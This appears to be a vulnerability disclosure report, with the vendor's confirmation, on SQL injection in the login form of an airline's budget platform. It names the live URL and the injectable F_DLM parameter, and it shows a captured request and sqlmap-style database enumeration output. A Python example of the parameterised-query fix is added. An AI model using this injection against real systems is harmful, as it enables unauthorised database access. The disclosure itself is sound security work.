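2013-10-18: Details reported to the vendor; awaiting vendor action
2013-10-18: Vendor confirmed; details disclosed to the vendor only
2013-10-28: Details disclosed to core white hats and experts in related fields
2013-11-07: Details disclosed to regular white hats
2013-11-17: Details disclosed to trainee white hats
2013-12-02: Details disclosed to the public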
Wahaha, the ATM is here!
Vulnerable system: Comprehensive Budget Application Platform (aspx + Oracle)
http://cw-info.shenzhenair.com/QMYS/Web/Login.aspx
The login page does not filter input, which leads to SQL injection in the login form. Captured login request:
POST /QMYS/Web/LoginCheck.aspx HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/xaml+xml, application/x-ms-xbap, application/x-ms-application, */*
Referer: http://cw-info.shenzhenair.com/QMYS/Web/Login.aspx
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET4.0C; .NET4.0E)
Host: cw-info.shenzhenair.com
Content-Length: 76
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: ASP.NET_SessionId=rivobj21bxefuf55b3q1em55; Seeyon_Q_Cookies=GUID_IP=fe2cab85-abf0-4c5b-b665-2742c5a8c42f

F_DLM=admin&F_MM=admin&statedatetime=Fri+Oct+18+10%3A26%3A13+UTC%2B0800+2013
The F_DLM parameter is injectable.
Databases enumerated through the injection:
available databases [3]:
[*] CWYS2
[*] SYS
[*] SYSTEM
current schema (equivalent to database on Oracle): 'CWYS2'
The current database, CWYS2, has more than 300 tables; I did not read them. Please fix this quickly.
[10:30:02] [INFO] the SQL query used returns 369 entries
[10:30:03] [INFO] retrieved: TB_ZX_SKDWXXB_20110112
[10:30:04] [INFO] retrieved: TB_ZX_BDMXB_20110112
[10:30:04] [INFO] retrieved: TB_ZX_BDZB_20110112
[10:30:06] [INFO] retrieved: XY_DEL_ZX_BDZB
[10:30:07] [INFO] retrieved: TB_ZX_YHFKDFPXX
[10:30:08] [INFO] retrieved: TMP_XX
[10:30:08] [INFO] retrieved: NS_STATS
[10:30:09] [INFO] retrieved: TB_XT_GNML_20101008
[10:30:10] [INFO] retrieved: TB_YS_YSNDTXB_20101008
[10:30:10] [INFO] retrieved: TB_YS_NDHZB_20130106
[10:30:11] [INFO] retrieved: TB_YS_YSBDMXB_20100628
See the detailed description.
0x1: All user input must be filtered.
0x2: Requesting rank 20.
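Added example (not part of the original report and not the vendor's code): alongside input filtering, the durable fix for an injectable login field such as F_DLM is to pass values as bind parameters so they never become SQL text. SQLite stands in for Oracle so the example runs offline; the users table, its columns, the length limits and the credentials are constructed assumptions.

```python
import hashlib
import hmac
import os
import sqlite3
from urllib.parse import parse_qs

def kdf(password, salt):
    """Derive a password hash (PBKDF2-HMAC-SHA256)."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)

def make_db():
    """Constructed user table; schema and credentials are assumptions."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (login TEXT PRIMARY KEY, salt BLOB, pw_hash BLOB)")
    salt = os.urandom(16)
    db.execute("INSERT INTO users VALUES (?, ?, ?)",
               ("demo_user", salt, kdf("constructed-password", salt)))
    return db

def lookup_concatenated(db, login):
    """Flawed pattern: the login value becomes part of the SQL text."""
    sql = "SELECT salt, pw_hash FROM users WHERE login = '" + login + "'"
    return db.execute(sql).fetchall()

def lookup_bound(db, login):
    """Fix: constant SQL text, value passed as a bind parameter."""
    sql = "SELECT salt, pw_hash FROM users WHERE login = ?"
    return db.execute(sql, (login,)).fetchall()

def check_login(db, body, lookup=lookup_bound):
    """Handle a form-urlencoded login body carrying F_DLM and F_MM."""
    form = parse_qs(body, keep_blank_values=True)
    login = form.get("F_DLM", [""])[0]
    password = form.get("F_MM", [""])[0]
    # Length limits are defence in depth, not the injection fix itself.
    if not (0 < len(login) <= 64) or len(password) > 128:
        return False
    rows = lookup(db, login)
    if len(rows) != 1:
        return False
    salt, pw_hash = rows[0]
    return hmac.compare_digest(kdf(password, salt), pw_hash)
```

A login value containing a single quote makes lookup_concatenated fail with a SQL syntax error because the value reached the SQL parser, while lookup_bound treats it as plain data and returns no rows.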
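Severity: High
Vulnerability Rank: 20
Confirmed: 2013-10-18 14:02
Thank you for your attention and help with Shenzhen Airlines' information systems. We will investigate and patch the vulnerability as soon as possible.
None yet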